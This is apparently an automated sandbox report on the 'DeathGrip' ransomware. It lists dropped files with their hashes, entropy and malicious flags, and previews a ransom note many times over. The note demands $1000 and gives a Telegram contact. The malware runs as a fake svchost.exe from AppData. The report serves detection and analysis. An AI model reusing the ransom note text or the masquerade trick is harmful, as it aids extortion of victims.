                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.115346786544661
                                                          Encrypted:false
                                                          SSDEEP:6:7GX76LGckv8sLCSKy8bD1nFv78JEP/LE1SmSJTfSkFPzTZWH/gJH1smM04Qd7:CXbc6LCSKzD1J8KP/L/JNzVW4404Qd7
                                                          MD5:B08414CD64856D50F13C252D902335D0
                                                          SHA1:7D07465572705A05B37D30CB53667BD53281CC09
                                                          SHA-256:FFE3C7DA4E1B8D8CBB86DD60DA20579A4893F0D4CA2C08151EAFDCC6894B1828
                                                          SHA-512:2F2B02A60D2BAB6AC442CBB53EAD1F8AD42A2453F5287BCE551C70E55192C430E946C5FAA9391888AD070AFBC5AB28148A14F031FA9D3A340581A05EA419F11D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3232
                                                          Entropy (8bit):7.928636054326848
                                                          Encrypted:false
                                                          SSDEEP:96:lHVS9LQR8eUv+SoFzLsPp31VWhrhtAIZC:gRknshFVQbZC
                                                          MD5:5BB8D5D9AA8060B285DAB6016284B337
                                                          SHA1:E2CB01CAA072E0E58434F660188D4F3A2A5745EA
                                                          SHA-256:5A6EFEE201BE939FD0AEF3AAD57372BA9A35DCF8CC162E04172F06BBB2EBA52A
                                                          SHA-512:559059AC9391B90F65954C6D2D4A3C8F0FD7D5D9696BB34210D523A980A9D2E0C3E39B3ABCD2A4C9C103315D013101BB21491045727E060484EF1EC314A383B0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11168
                                                          Entropy (8bit):7.981657259519676
                                                          Encrypted:false
                                                          SSDEEP:192:5EyajvxoNc1+H3UauqAMKqqNsK+/neQW3hQuzHGsKRJgZ17YImPBL6bpvWWWg2L2:5EySp2cIXopFqqNsMzxJzHGsKRCZSGbh
                                                          MD5:F472D6D88B79A9A0D42A971E2834749D
                                                          SHA1:ABEF6ACE99C1D4EA2A37777DBB36EA08905CDC86
                                                          SHA-256:DCD36F428B39AD28947C8AE7B5D10043A02699294B9C344478343436B060EE5F
                                                          SHA-512:6C9C0DAC0BE80BC4B194B368EC5069D0347CAD182973D5730B61EB1D3944F53471E3D6E4730E9E9E75042D7A0D0DFD07FC41A6CD1CA3E1D714439A9F203651C3
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):545360
                                                          Entropy (8bit):7.999682540239591
                                                          Encrypted:true
                                                          SSDEEP:12288:malyGc7ZtnAYJDxBG+UGLQiBhgXs+5t/TEsG9j:7lyGc1RdNBVXQt7E1x
                                                          MD5:188F502007045AB94DBCC4556284BE0F
                                                          SHA1:A20C1EFB9E36E39F64298E3CE38E18612EDAD2D4
                                                          SHA-256:4F59E2D404CAAC5EA8CDC025465F11EF89670C02C190D886A064EFDF553AC93D
                                                          SHA-512:B4AB0F520998D43951CB3D8199B166B71DE75093C1EB5E2EEA9B837E93E214DD43B0C84AFC7A592075E5AFFB2C9DDBE0010D7DCF17629C66B9F457C255B5722D
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):59120
                                                          Entropy (8bit):7.996714147572067
                                                          Encrypted:true
                                                          SSDEEP:768:MIOIOAOEVvd5whmMuKwi+EDeQosX6q0AJr+FkcLSm4wWQHHobZv:/OAOqvd4JDjvd0AJr+FkcLhnoR
                                                          MD5:36D03BA43F06C73118413FDDC77B2D92
                                                          SHA1:251CF19B685D57DCE8B1BA6E7E864A16CD5DFFF5
                                                          SHA-256:DFD33384D10300372709795AE0941B60FA77FDCD3314584CF56640EC3B7CD06E
                                                          SHA-512:D97DA24D2FA910FAE4DB4257FB3A6D60F20CF98A041E3509138DB9BF81C80D296113462D57BCA5EE148F20E146104978990540DDC9845EA3EFA9BE183CC561E3
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.781271963002579
                                                          Encrypted:false
                                                          SSDEEP:12:wNQbn6EQnnj2wn9Vinnie01W6AQ3+1vOgMy5KY3xSak:wCbLQnj2wn9VinnZ0wfQO1vHlNcak
                                                          MD5:0992BE80C33C2E1BD0DDDB0C7A84EFC2
                                                          SHA1:BDCF01597621434CC86262F5846637E25E3EF399
                                                          SHA-256:639AB1C0F3E4E4D339B06B16EAEC5D65D2335FE57D5EC4BCD0825605AAF12CB8
                                                          SHA-512:07820E478FD687346ED78D3C8398A8EBE01211EEC72B0B8570A2EA3FB8F1652A3D60A9374394ADB0D97172B8DEDC75C6D585D5BD9FB837D62DAAA51A1057A13B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126464
                                                          Entropy (8bit):7.998580305321073
                                                          Encrypted:true
                                                          SSDEEP:3072:7coJ3SKmHXkE2kD3v3IHMvMR5y5iA5VhUS6PzKxQu7KC:IeiKekk4sZcAptqKK0
                                                          MD5:FB19204B45B1E5720308C309939C211F
                                                          SHA1:591DBA3D8EEC68CC2A594D18A802FA63524A39A2
                                                          SHA-256:672F84A3E539E622F621F409E4E7EC70B4FC7C1D7A4658965BA7BDF648466D8B
                                                          SHA-512:8FA5B67C072742A0C98FFC82A55EE28118128A446B1D17FD25D287A8E86D12CB341198CE0ED6A8FEE8A01386D838B2682A50985ECC95FC66227F16CFEF5599D6
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1968
                                                          Entropy (8bit):7.8526690430085395
                                                          Encrypted:false
                                                          SSDEEP:48:vOwq0FKGKIXLFiMqT2YHPd7fyuV7AH+bf0rCXAid:Zqx6BLiduuVEH+bgCQid
                                                          MD5:C4CD6C36F22EE6980BCB5D49309AC93E
                                                          SHA1:279163BE53E03D1DE6F7CB66C7BF604F5C4CC0A5
                                                          SHA-256:F10620CE94C7A7AF9CCEC18AA411C70976EB14FE65A9FEC935A0E0B749F6BB3B
                                                          SHA-512:DA909F6CB2980EFE85344421A4800E627B0C461E155ED48CF7152B1F3D3FE53D7817AC4E283017FFCF42E20F748DB89B9BA8C564A06DD78D87CC9006DDAC2B07
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20784
                                                          Entropy (8bit):7.991922321649463
                                                          Encrypted:true
                                                          SSDEEP:384:QxTowoE4sLw1gQq6MYuLCXBTxZTgoao375//ncGxiRlEyEc:Q7LvCXB7xao3N3c9Ec
                                                          MD5:E6EC75DFA4AEA18B66839A85C69E74E5
                                                          SHA1:B2E3E0546AA522A48217D89E4E73292F148F1C97
                                                          SHA-256:983FDAF43211CAA471406E87AC044C24970FEA11F7268D9A7E9B0EDDD9E8AC67
                                                          SHA-512:4B9532EC05FBFE2C3BD19AEBB0EC57E48C0F625786603E89DCEE91C9F88290F70E56616316C3C467A8753D8E0352F34A05779B34A0508FC52722B9BFC4AE4B6B
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):254784
                                                          Entropy (8bit):7.999109600912854
                                                          Encrypted:true
                                                          SSDEEP:6144:+4YuGN8DefzgCCEnfTCjCafeOzMSvV16URxtdTKkjc:+7uGN8DefzgGTa8Obvv6URxbTK8c
                                                          MD5:BAB85ABDD8AACF7EC4D3B01A0E9345A3
                                                          SHA1:1F53E6F0CFAB3507B8D15B77A62AFDEF999A3344
                                                          SHA-256:C7DD4B9722507C411DB9385EBA0560F5F8AEBC192A60BB2A0378FA1A4BACA971
